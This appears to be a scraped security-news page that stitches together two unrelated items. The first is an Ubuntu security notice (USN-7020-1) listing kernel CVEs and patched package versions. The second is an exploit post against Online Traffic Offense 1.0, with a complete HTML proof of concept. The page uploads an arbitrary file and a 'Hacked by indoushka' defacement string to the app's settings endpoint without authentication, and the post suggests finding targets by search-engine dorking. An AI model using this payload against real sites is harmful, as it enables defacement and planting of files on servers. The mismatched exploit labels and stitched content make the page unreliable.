    ==========================================================================Ubuntu Security Notice USN-7020-1September 18, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency,linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8,linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-nvidia-lowlatency: Linux low latency kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-lowlatency-hwe-6.8: Linux low latency kernel- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Network drivers;  - SCSI drivers;  - F2FS file system;  - BPF subsystem;  - IPv4 networking;(CVE-2024-42160, CVE-2024-42159, CVE-2024-42154, CVE-2024-41009,CVE-2024-42228, CVE-2024-42224)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1011-gke      6.8.0-1011.14  linux-image-6.8.0-1013-ibm      6.8.0-1013.13  linux-image-6.8.0-1013-oem      6.8.0-1013.13  linux-image-6.8.0-1013-oracle   6.8.0-1013.13  linux-image-6.8.0-1013-oracle-64k  6.8.0-1013.13  linux-image-6.8.0-1014-nvidia   6.8.0-1014.15  linux-image-6.8.0-1014-nvidia-64k  6.8.0-1014.15  linux-image-6.8.0-1014-nvidia-lowlatency  6.8.0-1014.15.1  linux-image-6.8.0-1014-nvidia-lowlatency-64k  6.8.0-1014.15.1  linux-image-6.8.0-1015-gcp      6.8.0-1015.17  linux-image-6.8.0-1016-aws      6.8.0-1016.17  linux-image-6.8.0-45-generic    6.8.0-45.45  linux-image-6.8.0-45-generic-64k  6.8.0-45.45  linux-image-6.8.0-45-lowlatency  6.8.0-45.45.1  linux-image-6.8.0-45-lowlatency-64k  6.8.0-45.45.1  linux-image-aws                 6.8.0-1016.17  linux-image-gcp                 6.8.0-1015.17  linux-image-generic             6.8.0-45.45  linux-image-generic-64k         6.8.0-45.45  linux-image-generic-64k-hwe-24.04  6.8.0-45.45  linux-image-generic-hwe-24.04   6.8.0-45.45  linux-image-generic-lpae        6.8.0-45.45  linux-image-gke                 6.8.0-1011.14  linux-image-ibm                 6.8.0-1013.13  linux-image-ibm-classic         6.8.0-1013.13  linux-image-ibm-lts-24.04       6.8.0-1013.13  linux-image-kvm                 6.8.0-45.45  linux-image-lowlatency          6.8.0-45.45.1  linux-image-lowlatency-64k      6.8.0-45.45.1  linux-image-nvidia              6.8.0-1014.15  linux-image-nvidia-64k          6.8.0-1014.15  linux-image-nvidia-lowlatency   6.8.0-1014.15.1  linux-image-nvidia-lowlatency-64k  6.8.0-1014.15.1  linux-image-oem-24.04           6.8.0-1013.13  linux-image-oem-24.04a          6.8.0-1013.13  linux-image-oracle              6.8.0-1013.13  linux-image-oracle-64k          6.8.0-1013.13  linux-image-virtual             6.8.0-45.45  linux-image-virtual-hwe-24.04   6.8.0-45.45Ubuntu 22.04 LTS  linux-image-6.8.0-1014-nvidia   6.8.0-1014.15~22.04.1  linux-image-6.8.0-1014-nvidia-64k  6.8.0-1014.15~22.04.1  linux-image-6.8.0-45-lowlatency  6.8.0-45.45.1~22.04.1  linux-image-6.8.0-45-lowlatency-64k  6.8.0-45.45.1~22.04.1  linux-image-lowlatency-64k-hwe-22.04  6.8.0-45.45.1~22.04.1  linux-image-lowlatency-hwe-22.04  6.8.0-45.45.1~22.04.1  linux-image-nvidia-6.8          6.8.0-1014.15~22.04.1  linux-image-nvidia-64k-6.8      6.8.0-1014.15~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7020-1  CVE-2024-41009, CVE-2024-42154, CVE-2024-42159, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-45.45  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1016.17  https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1015.17  https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1011.14  https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1013.13  https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-45.45.1  https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1014.15  https://launchpad.net/ubuntu/+source/linux-nvidia-lowlatency/6.8.0-1014.15.1  https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1013.13  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1013.13  https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-6.8/6.8.0-45.45.1~22.04.1  https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1014.15~22.04.1

Ubuntu Security Notice USN-7020-1

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Latest News